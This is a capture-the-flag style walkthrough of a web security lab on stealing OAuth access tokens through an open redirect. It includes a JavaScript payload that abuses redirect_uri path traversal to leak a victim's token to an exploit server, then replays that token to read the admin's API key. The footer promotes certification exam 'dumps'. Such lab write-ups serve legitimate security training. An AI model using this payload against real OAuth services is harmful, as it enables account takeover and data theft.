21.5 Lab: Stealing OAuth access tokens via an open redirect | 2024

This lab uses an OAuth service to allow users to log in with their social media accounts. Flawed validation by the OAuth service makes it possible for an attacker to leak access tokens to arbitrary pages on the client application. To solve the lab, identify an open redirect on the blog website and use this to steal an access token for the admin user’s account | Karthikeyan Nagaraj

Description

This lab uses an OAuth service to allow users to log in with their social media accounts. Flawed validation by the OAuth service makes it possible for an attacker to leak access tokens to arbitrary pages on the client application.

To solve the lab, identify an open redirect on the blog website and use this to steal an access token for the admin user’s account. Use the access token to obtain the admin’s API key and submit the solution using the button provided in the lab banner.

Note

You cannot access the admin’s API key by simply logging in to their account on the client application.

The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.

You can log in via your own social media account using the following credentials: wiener:peter.

Solution

1. Turn on Foxy Proxy on browser and turn off the Intercept in Burp.
2. Log in to your account and logout.
3. You now need to create an exploit that first forces the victim to visit your malicious URL and then executes the script you just tested to steal their access token. For example:
   Replace the suitable values in the below request, you can access the Client_id in the http history on /GET /auth?client_id=[…]

<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

4. Store the Exploit, the page should appear to refresh, but if you check the access log, you should see a new request for GET /?access_token=[...].

5. Deliver the exploit to the victim, then copy their access token from the log.

6. In http history, find and send theGET /me request to the repeater and replace the token in the Authorization: Bearer header with the one you just copied.

7. Send the request. Observe that you have successfully made an API call to fetch the victim's data, including their API key.

8. Use the “Submit Solution” button at the top of the lab page to submit the stolen key and solve the lab.

A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups

Cyberw1ng

Telegram Channel for Free Ethical Hacking Dumps

Ethical Hacking Dumps — CEH, OSCP, Comptia

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng